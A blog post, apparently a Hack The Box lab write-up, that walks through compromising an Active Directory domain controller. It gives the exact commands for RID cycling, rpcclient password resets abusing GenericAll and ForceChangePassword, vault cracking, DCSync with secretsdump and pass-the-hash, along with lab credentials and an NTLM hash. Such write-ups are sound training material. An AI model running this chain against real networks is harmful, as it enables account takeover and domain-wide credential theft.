← Back to list

Abusing ACLs, GenericWrite, and DCSync in Active Directory — HTB Administrator

Introduction

Md Fahim Al Shihab · 2026-05-19 18:04 · 0 claps · 2.8 min read
#hackthebox #cpt #cybersecurity #active-directory #hacking
Open on Medium ↗
Wiki topics: 🔒 · Cybersecurity 🎬 · Film & Television

Abusing ACLs, GenericWrite, and DCSync in Active Directory — HTB Administrator

Introduction

This machine demonstrates a full Active Directory attack chain based entirely on:

  • ACL Abuse
  • BloodHound Analysis
  • GenericAll
  • ForceChangePassword
  • Credential Pivoting
  • GenericWrite
  • DCSync

No exploit or memory corruption vulnerability was required. The compromise relied completely on abusing delegated Active Directory permissions.

Initial Enumeration

We begin with valid credentials:

Olivia : ichliebedich

Initial scan:

nmap -sC -sS -sV 10.129.180.139

Important services identified:

PortService21FTP88Kerberos389LDAP445SMB5985WinRM

The target is identified as a:

Windows Active Directory Domain Controller

RID Cycling

Enumerating domain users:

impacket-lookupsid Olivia:ichliebedich@10.129.180.139 | grep SidTypeUser

Users discovered:

Administrator
krbtgt
olivia
michael
benjamin
emily
ethan

This demonstrates:

RID Cycling

where predictable SID values allow domain user enumeration.

Verifying WinRM Access

Checking remote management access:

netexec winrm 10.129.180.139 -u Olivia -p 'ichliebedich'

Result:

administrator.htb\\Olivia (Pwn3d!)

This confirms:

Remote PowerShell Access

BloodHound Enumeration

Collecting BloodHound data:

bloodhound-python -u Olivia -p 'ichliebedich' -c All -d administrator.htb -dc dc.administrator.htb -ns 10.129.180.139

Inside BloodHound:

Olivia
    ↓ GenericAll
Michael

GenericAll Abuse

GenericAll provides full control over the target object.

We abuse it by resetting Michael’s password:

rpcclient -U "olivia%ichliebedich" 10.129.180.139 -c "setuserinfo2 MICHAEL 23 12345678"

Now we control:

Michael

ForceChangePassword Abuse

BloodHound reveals:

Michael
    ↓ ForceChangePassword
Benjamin

Resetting Benjamin’s password:

rpcclient -U "Michael%12345678" 10.129.180.139 -c "setuserinfo2 BENJAMIN 23 12345678"

Now we control:

Benjamin

FTP Enumeration

Using Benjamin’s credentials:

ftp 10.129.180.139

Interesting file discovered:

Backup.psafe3

Cracking the Password Safe Vault

Extracting the hash:

pwsafe2john Backup.psafe3 > hash

Cracking the vault:

john hash -w=/usr/share/wordlists/rockyou.txt

Recovered password:

tekieromucho

Opening the vault:

pwsafe Backup.psafe3

Inside the vault we recover credentials for:

Emily

WinRM Access as Emily

Authenticating through WinRM:

evil-winrm -i 10.129.180.139 -u emily -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb'

Successful access:

administrator.htb\\emily

GenericWrite Abuse

BloodHound reveals another ACL relationship:

Emily
    ↓ GenericWrite
Ethan

Ethan possesses:

DCSync Rights

Understanding DCSync

DCSync abuses Active Directory replication privileges.

Accounts with replication rights can request:

  • NTLM hashes
  • Kerberos keys
  • Credential material

directly from the Domain Controller.

This effectively simulates Domain Controller replication behavior.

DCSync Abuse

Using Ethan’s credentials:

impacket-secretsdump administrator.htb/ethan:limpbizkit@10.129.180.139

Hashes successfully recovered:

Administrator NTLM Hash
KRBTGT Hash
Domain Credential Material

Important result:

Administrator:500:aad3b435b51404eeaad3b435b51404ee:3dc553ce4b9fd20bd016e098d2d2fd2e

Pass-the-Hash

Authenticating directly as Administrator:

evil-winrm -i 10.129.180.139 -u Administrator -H 3dc553ce4b9fd20bd016e098d2d2fd2e

Successful authentication confirms:

Full Domain Administrator Compromise 🔥

Full Attack Chain

Olivia Credentials
        ↓
RID Cycling
        ↓
BloodHound Enumeration
        ↓
GenericAll → Michael
        ↓
Password Reset Abuse
        ↓
ForceChangePassword → Benjamin
        ↓
FTP Access
        ↓
Password Safe Discovery
        ↓
Vault Cracking
        ↓
Emily Credentials
        ↓
WinRM Access
        ↓
GenericWrite → Ethan
        ↓
DCSync
        ↓
Administrator Hash
        ↓
Pass-the-Hash
        ↓
Full Domain Compromise

Key AD Concepts

  • Active Directory ACLs create hidden privilege escalation paths
  • GenericAll equals full object compromise
  • ForceChangePassword enables direct account takeover
  • GenericWrite enables attribute abuse and privilege escalation
  • DCSync effectively equals Domain Admin
  • BloodHound is essential for visualizing ACL attack paths

Conclusion

This machine demonstrates how modern Active Directory attacks increasingly rely on:

  • ACL abuse
  • Delegated permissions
  • Credential pivoting
  • Replication privilege abuse

rather than traditional exploitation.

The entire domain compromise was achieved using legitimate Active Directory functionality exactly as designed.


메타데이터
post_id
6d97bfaf50af
slug
abusing-acls-genericwrite-and-dcsync-in-active-directory-htb-administrator-6d97bfaf50af
url
https://medium.com/@fahimalshihabifty/abusing-acls-genericwrite-and-dcsync-in-active-directory-htb-administrator-6d97bfaf50af
canonical_url
https://medium.com/@fahimalshihabifty/abusing-acls-genericwrite-and-dcsync-in-active-directory-htb-administrator-6d97bfaf50af
author_url
https://medium.com/@fahimalshihabifty
status
ok
fetched_at
2026-06-09 15:37:30